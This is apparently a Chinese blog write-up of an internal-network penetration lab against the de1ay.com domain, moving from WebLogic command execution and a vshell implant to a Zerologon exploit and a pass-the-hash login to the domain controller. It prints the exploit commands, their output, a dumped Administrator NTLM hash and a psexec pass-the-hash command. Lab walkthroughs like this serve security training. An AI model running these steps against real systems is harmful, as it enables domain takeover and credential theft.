内网渗透-项目2二层网络

信息搜集

目标是10.10.0.102

使用fscan扫描

PS> .\fscan.exe -h 10.10.0.102
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-19 15:22:35] [INFO] 暴力破解线程数: 1
[2025-04-19 15:22:35] [INFO] 开始信息扫描
[2025-04-19 15:22:35] [INFO] 最终有效主机数量: 1
[2025-04-19 15:22:36] [INFO] 开始主机扫描
[2025-04-19 15:22:36] [INFO] 有效端口数量: 233
[2025-04-19 15:22:36] [SUCCESS] 端口开放 10.10.0.102:135
[2025-04-19 15:22:36] [SUCCESS] 端口开放 10.10.0.102:139
[2025-04-19 15:22:36] [SUCCESS] 端口开放 10.10.0.102:80
[2025-04-19 15:22:36] [SUCCESS] 端口开放 10.10.0.102:445
[2025-04-19 15:22:39] [SUCCESS] 端口开放 10.10.0.102:7001
[2025-04-19 15:22:41] [SUCCESS] 服务识别 10.10.0.102:139 =>  Banner:[.]
[2025-04-19 15:22:41] [SUCCESS] 服务识别 10.10.0.102:80 => [http] 版本:7.5 产品:Microsoft IIS httpd 系统:Windows
[2025-04-19 15:22:43] [SUCCESS] 服务识别 10.10.0.102:445 =>
[2025-04-19 15:22:49] [SUCCESS] 服务识别 10.10.0.102:7001 => [http]
[2025-04-19 15:23:41] [SUCCESS] 服务识别 10.10.0.102:135 =>
[2025-04-19 15:23:41] [INFO] 存活端口数量: 5
[2025-04-19 15:23:41] [INFO] 开始漏洞扫描
[2025-04-19 15:23:41] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, webpoc, webtitle
[2025-04-19 15:23:41] [SUCCESS] 网站标题 http://10.10.0.102        状态码:200 长度:0      标题:无标题
[2025-04-19 15:23:42] [SUCCESS] NetInfo 扫描结果
目标主机: 10.10.0.102
主机名: WEB
发现的网络接口:
   IPv4地址:
      └─ 10.10.0.102
      └─ 10.10.10.80
[2025-04-19 15:23:42] [SUCCESS] NetBios 10.10.0.102     WEB.de1ay.com                       Windows Server 2008 R2 Standard 7601 Service Pack 1
[2025-04-19 15:23:42] [SUCCESS] 发现漏洞 10.10.0.102 [Windows Server 2008 R2 Standard 7601 Service Pack 1] MS17-010
[2025-04-19 15:23:45] [SUCCESS] 网站标题 http://10.10.0.102:7001   状态码:404 长度:1164   标题:Error 404--Not Found
[2025-04-19 15:23:45] [SUCCESS] 发现指纹 目标: http://10.10.0.102:7001   指纹: [weblogic]

信息整理

主机基础信息

  • 目标IP: 10.10.0.102
  • 主机名: WEB.de1ay.com
  • 操作系统: Windows Server 2008 R2 Standard 7601 Service Pack 1
  • 网络接口:
    • IPv4: 10.10.0.102, 10.10.10.80

开放端口与服务识别

端口 服务 版本/指纹信息 备注
135 (未识别) 无详细服务信息 常见于 Windows RPC
139 NetBios 系统版本同主机信息 SMB 文件共享协议
80 HTTP Microsoft IIS httpd 7.5 网站标题为空
445 (未识别) 无详细服务信息 高危端口(SMB 相关)
7001 HTTP 指纹: weblogic 返回 404 错误页面

关键漏洞与风险

高危漏洞

  • MS17-010(永恒之蓝)
    • [Windows Server 2008 R2 Standard 7601 Service Pack 1] MS17-010

其他发现

  • WebLogic 指纹(7001端口)
    • 可能为 Oracle WebLogic Server,需检查是否存在未授权访问、反序列化漏洞(如 CVE-2017-10271)。
    • 当前返回 404 Error,可能是未配置应用或路径错误。
  • 空网站标题(80端口)
    • 网站无标题且内容长度为0,手动访问后无内容。

漏洞验证&利用

永恒之蓝

在msf中进行利用:

$R5DJJ0X

经尝试,无法利用。

weblogic漏洞

发现目标使用weblogic,使用工具尝试:

image-20250419153814445

存在漏洞,成功执行命令:

image-20250419153841781

上线vshell

在命令执行处执行上线命令:

image-20250419153959510

执行后成功上线:

image-20250419154212702

image-20250419154244944

内网横向

信息搜集

ipconfig /all

查看网络情况,查看网络相关内容:

C:\Oracle\Middleware\user_projects\domains\base_domain>ipconfig /all

Windows IP 配置

   主机名  . . . . . . . . . . . . . : WEB
   主 DNS 后缀 . . . . . . . . . . . : de1ay.com
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : de1ay.com

以太网适配器 本地连接 2:

   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   物理地址. . . . . . . . . . . . . : 00-0C-29-6F-05-DE
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::45eb:f2ec:2193:7ac8%13(首选)
   IPv4 地址 . . . . . . . . . . . . : 10.10.10.80(首选)
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS 服务器  . . . . . . . . . . . : 10.10.10.10
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   物理地址. . . . . . . . . . . . . : 00-0C-29-6F-05-D4
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::19ac:77a2:d596:c4e8%11(首选)
   IPv4 地址 . . . . . . . . . . . . : 10.10.0.102(首选)
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.10.0.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS 服务器  . . . . . . . . . . . : 114.114.114.114
                                       223.5.5.5
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

隧道适配器 isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

可以看到有两个ip:

  • 10.10.0.102:这个是对外的ip
  • 10.10.10.80:这个是对内的ip,应该就是内网的ip了

dns指向了一个域名,这个应该就是域控的域名了:

  • de1ay.com

systeminfo

查看主机信息:

C:\Oracle\Middleware\user_projects\domains\base_domain>systeminfo
                                                                              
主机名:           WEB
OS 名称:          Microsoft Windows Server 2008 R2 Standard
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:
产品 ID:          00477-001-0000421-84103
初始安装日期:     2019/9/8, 19:01:04
系统启动时间:     2024/4/9, 7:12:37
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,149 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,019 MB
虚拟内存: 使用中: 1,076 MB
页面文件位置:     C:\pagefile.sys
域:               de1ay.com
登录服务器:       \\WEB
修补程序:         安装了 3 个修补程序。
                  [01]: KB2999226
                  [02]: KB958488
                  [03]: KB976902
网卡:             安装了 2 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                        [01]: 10.10.0.102
                        [02]: fe80::19ac:77a2:d596:c4e8
                  [02]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接 2
                      启用 DHCP:   否
                      IP 地址
                        [01]: 10.10.10.80
                        [02]: fe80::45eb:f2ec:2193:7ac8

可以看到这里面也写了域的域名:de1ay.com

域ip探测

ping域名,得到其ip:

C:\Oracle\Middleware\user_projects\domains\base_domain>ping de1ay.com

正在 Ping de1ay.com [10.10.10.10] 具有 32 字节的数据:
来自 10.10.10.10 的回复: 字节=32 时间<1ms TTL=128
来自 10.10.10.10 的回复: 字节=32 时间<1ms TTL=128
来自 10.10.10.10 的回复: 字节=32 时间<1ms TTL=128
来自 10.10.10.10 的回复: 字节=32 时间<1ms TTL=128

10.10.10.10 的 Ping 统计信息:
    数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
    最短 = 0ms,最长 = 0ms,平均 = 0ms

得到DC的ip为:10.10.10.10

zerologon复现

先使用zerologon-shut验证&利用zerologon漏洞:

PS>python .\zerologon-Shot.py 10.10.10.10
[*] LDAP enumerate result: hostname: DC$, domain: de1ay.com
[*] Try to auth ldap use user: DC$ with none password (if target has been pwned before)
[*] Auth failed, start attacking.
[+] Performing authentication attempts...
===========================================================
[+] Target vulnerable, changing account password to empty string
[+] Result: 0
[+] Exploit complete!
[+] Retrieved all domain admin cred. (save creds to file "DC$_10.10.10.10_domain_admins.ntds")
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
[+] Use domain admin: Administrator to restore DC password
[+] Get DC origin password:
f89fe6993a931eab3a0f13c8b5151c2ec5e5079fd83bc37da2a79a2f8f88f4055cfe7942d6b346b2d97ae4fe211c4e3beab43ff86e7c20324d42ad8ba556b5293c9d00955034ef28bad24a6c4cdb2281b85691242d1fde69e6236eab77caaf533db68d207469cf42d486a1760980de9db8e453a868abb893e69239b1d1e9117e809b8aed2b4f59fc63fbafc70583f5d4e0953f45d145b4c18328f5ca07c265997f3448dc60c530665578f348d30fe3a3829501a565d835c05c4c4e501f0f4bafeb168a48a4ed7c97a4fcd9b3024e658afd272c9546c7fe90c56e4669b8f0b85ccfe2dfbff24437c4bb54acd3c1020a88

[+] Restore DC password: OK

成功利用,存在该漏洞,直接拿到了hash。

PtH攻击

使用PsExec.exe直接PtH:

PS> python .\psexec.py ./Administrator@10.10.10.10 -hashes :161cff084477fe596a5db81874498a24 -codec 936
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.10.10.10.....
[*] Found writable share ADMIN$
[*] Uploading file DdTkpGDb.exe
[*] Opening SVCManager on 10.10.10.10.....
[*] Creating service kKNW on 10.10.10.10.....
[*] Starting service kKNW.....
[!] Press help for extra shell commands
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> net user /domain

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            de1ay                    Guest
krbtgt                   mssql
命令运行完毕,但发生一个或多个错误。


C:\Windows\system32> hostname
DC

拿下DC

posted @ 2025-12-03 09:21  shinianyunyan  阅读(13)  评论(0)    收藏  举报